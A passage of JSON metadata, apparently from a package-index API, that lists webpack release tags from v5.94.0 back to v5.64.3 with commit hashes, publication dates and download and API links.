mmit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_pa